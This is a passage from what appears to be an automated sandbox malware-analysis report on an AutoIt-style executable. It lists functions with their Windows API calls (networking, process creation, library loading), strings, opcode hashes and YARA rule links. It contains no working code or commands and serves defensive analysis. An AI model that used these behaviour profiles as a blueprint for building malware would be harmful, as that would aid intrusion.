                                                                                                                                                                                                                                                                                                        • API String ID: 176396367-1603158881
                                                                                                                                                                                                                                                                                                        • Opcode ID: a6c42936c3097b51959139110d6bcb13dae8c49910c6675af5fb8580e801bb21
                                                                                                                                                                                                                                                                                                        • Instruction ID: 81154df0d52ebd5d7d85ca1c0e137b82a81e4b50df7c12601cdda710ae09bf05
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6c42936c3097b51959139110d6bcb13dae8c49910c6675af5fb8580e801bb21
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6E10532E00616DBCB149FB9C8817FDFBF1BF04720F044159E596EB255EB38A9899B90
                                                                                                                                                                                                                                                                                                        Function 01024F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,0104DCD0), ref: 01024F6C
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024F80
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01024FDE
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01025039
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01025084
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010250EC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FCFD52: _wcslen.LIBCMT ref: 00FCFD5D
                                                                                                                                                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,01077C10,00000061), ref: 01025188
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                        • Opcode ID: f506672682c54157c8d0e433eeca836b0f1daeb7505d34845986ca2c4141f555
                                                                                                                                                                                                                                                                                                        • Instruction ID: 79bbb35e670944ac5546e8ad4c450d50a98011b1e862bc60880bd5cd34ad9aa9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f506672682c54157c8d0e433eeca836b0f1daeb7505d34845986ca2c4141f555
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30B1F0316083229FC350DF28CC90AAEB7E6AF94764F50495DF5D6C7292DB38D844CB96
                                                                                                                                                                                                                                                                                                        Function 0103BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BBF8
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC10
                                                                                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC34
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BC60
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC74
                                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103BC96
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BD92
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01020F4E: GetStdHandle.KERNEL32(000000F6), ref: 01020F6D
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BDAB
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 0103BDC6
                                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103BE16
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 0103BE67
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103BE99
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BEAA
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BEBC
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0103BECE
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0103BF43
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 11ec25abcbf6617232d26b467ac93e34e07d7193c98fb9a8cad0e2f03ae553b7
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb75c1a2fb68210b7e2aede0ad29548ddb2e81ed6e41f96d8d61417674e205c6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11ec25abcbf6617232d26b467ac93e34e07d7193c98fb9a8cad0e2f03ae553b7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2F1BE716043009FD725EF29C891B6ABBE9AFC4314F08859DF5C58B2A2DB75E841CF52
                                                                                                                                                                                                                                                                                                        Function 01034A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0104DCD0), ref: 01034B18
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 01034B2A
                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0104DCD0), ref: 01034B4F
                                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,0104DCD0), ref: 01034B9B
                                                                                                                                                                                                                                                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,0104DCD0), ref: 01034C05
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000009), ref: 01034CBF
                                                                                                                                                                                                                                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01034D25
                                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 01034D4F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                        • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                        • Opcode ID: fe5d249ddbe71139c5c73a72c80669f02830c1ec22b66407ce34c2f8349f39e9
                                                                                                                                                                                                                                                                                                        • Instruction ID: 39602dfbdc334e18d1539b4bb44e65f898ea61aef78e66db0867255400666c10
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe5d249ddbe71139c5c73a72c80669f02830c1ec22b66407ce34c2f8349f39e9
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60123B75A00109AFDB54CF98C888EAEBBB9FF85314F148098E949DF251D735ED46CBA0
                                                                                                                                                                                                                                                                                                        Function 00FB381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(010829C0), ref: 00FF3F72
                                                                                                                                                                                                                                                                                                        • GetMenuItemCount.USER32(010829C0), ref: 00FF4022
                                                                                                                                                                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00FF4066
                                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00FF406F
                                                                                                                                                                                                                                                                                                        • TrackPopupMenuEx.USER32(010829C0,00000000,?,00000000,00000000,00000000), ref: 00FF4082
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF408E
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                        • Opcode ID: deeb085ec9e8ee06bdd3088f3651530d74ad59cafe292ca46c67e61730de3e51
                                                                                                                                                                                                                                                                                                        • Instruction ID: 74557a13abeacc2a9976b66482de07705959b858f9d1354a70ba7132f22b3ba8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: deeb085ec9e8ee06bdd3088f3651530d74ad59cafe292ca46c67e61730de3e51
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94712671A44209BFFB259F69DC88FAABF65FF04364F100216F624661E0C7B5A910EB91
                                                                                                                                                                                                                                                                                                        Function 01047711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(00000000,?), ref: 01047823
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01047897
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 010478B9
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 010478CC
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 010478ED
                                                                                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 0104791C
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01047935
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0104794E
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 01047955
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0104796D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01047985
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB2234: GetWindowLongW.USER32(?,000000EB), ref: 00FB2242
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                        • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                        • Opcode ID: f059c8dd1e22133c6aac1f9efadb4aae9e40d5c98badebbcf1af71b71e725140
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78b333f838eef0c85ff146c34de8683a27948919f8750f29cd7069f1d23b58c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f059c8dd1e22133c6aac1f9efadb4aae9e40d5c98badebbcf1af71b71e725140
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3171ABB4144244AFE761DF58CC84F6ABBE9FB8A304F0444AEF9C587261D775E90ACB12
                                                                                                                                                                                                                                                                                                        Function 01049B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00FB24B0
                                                                                                                                                                                                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 01049BA3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: ClientToScreen.USER32(?,?), ref: 010480D4
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: GetWindowRect.USER32(?,?), ref: 0104814A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 010480AE: PtInRect.USER32(?,?,?), ref: 0104815A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01049C0C
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 01049C17
                                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 01049C3A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01049C81
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 01049C9A
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 01049CB1
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 01049CD3
                                                                                                                                                                                                                                                                                                        • DragFinish.SHELL32(?), ref: 01049CDA
                                                                                                                                                                                                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 01049DCD
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                                                                                        • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                                                                                        • Opcode ID: 937f937754dfd8d0103c17a060cc0e53ef8ea02757856ee73246c56582cd59e5
                                                                                                                                                                                                                                                                                                        • Instruction ID: a1077a01d316403584ddbbfc5af31c532ed954fa71131f5ec7205aa6b4529a93
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 937f937754dfd8d0103c17a060cc0e53ef8ea02757856ee73246c56582cd59e5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F6177B1508305AFC711EFA1CC85DAFBBE8FF98750F00092EB5D1922A1DB759A09CB52
                                                                                                                                                                                                                                                                                                        Function 0102CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102CEF5
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102CF08
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102CF1C
                                                                                                                                                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0102CF35
                                                                                                                                                                                                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0102CF78
                                                                                                                                                                                                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0102CF8E
                                                                                                                                                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102CF99
                                                                                                                                                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102CFC9
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102D021
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102D035
                                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0102D040
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                        • Opcode ID: b8fa9302468f8c6d704b3629c765c778755be6cee077ea5f33fab2a2e0086587
                                                                                                                                                                                                                                                                                                        • Instruction ID: f22a13b3d9d547bbdbd7275d7fa6453f0d5619d23997bdefa32d4a0247a13f14
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8fa9302468f8c6d704b3629c765c778755be6cee077ea5f33fab2a2e0086587
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E518CB5500618BFEB619FA4CA88BAF7BFCFF18784F00845AF98586240D739D9459B60
                                                                                                                                                                                                                                                                                                        Function 01048FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,010466D6,?,?), ref: 01048FEE
                                                                                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01048FFE
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049009
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049016
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 01049024
                                                                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049033
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0104903C
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049043
                                                                                                                                                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,010466D6,?,?,00000000,?), ref: 01049054
                                                                                                                                                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,01050C04,?), ref: 0104906D
                                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0104907D
                                                                                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0104909D
                                                                                                                                                                                                                                                                                                        • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 010490CD
                                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 010490F5
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0104910B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3354425fb10c4a056e130c3793aed5f651a1cebbbdf2e14c11ecd3dfd7b551ce
                                                                                                                                                                                                                                                                                                        • Instruction ID: 53b2bef45f7345b4797ea030d9ae9337744204a79d39533c592b344f6437ec7a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3354425fb10c4a056e130c3793aed5f651a1cebbbdf2e14c11ecd3dfd7b551ce
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79414AB9600208BFDB219FA9DD88EAF7BB9FF99715F008068F985D7250D7359941CB20
                                                                                                                                                                                                                                                                                                        Function 0103C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
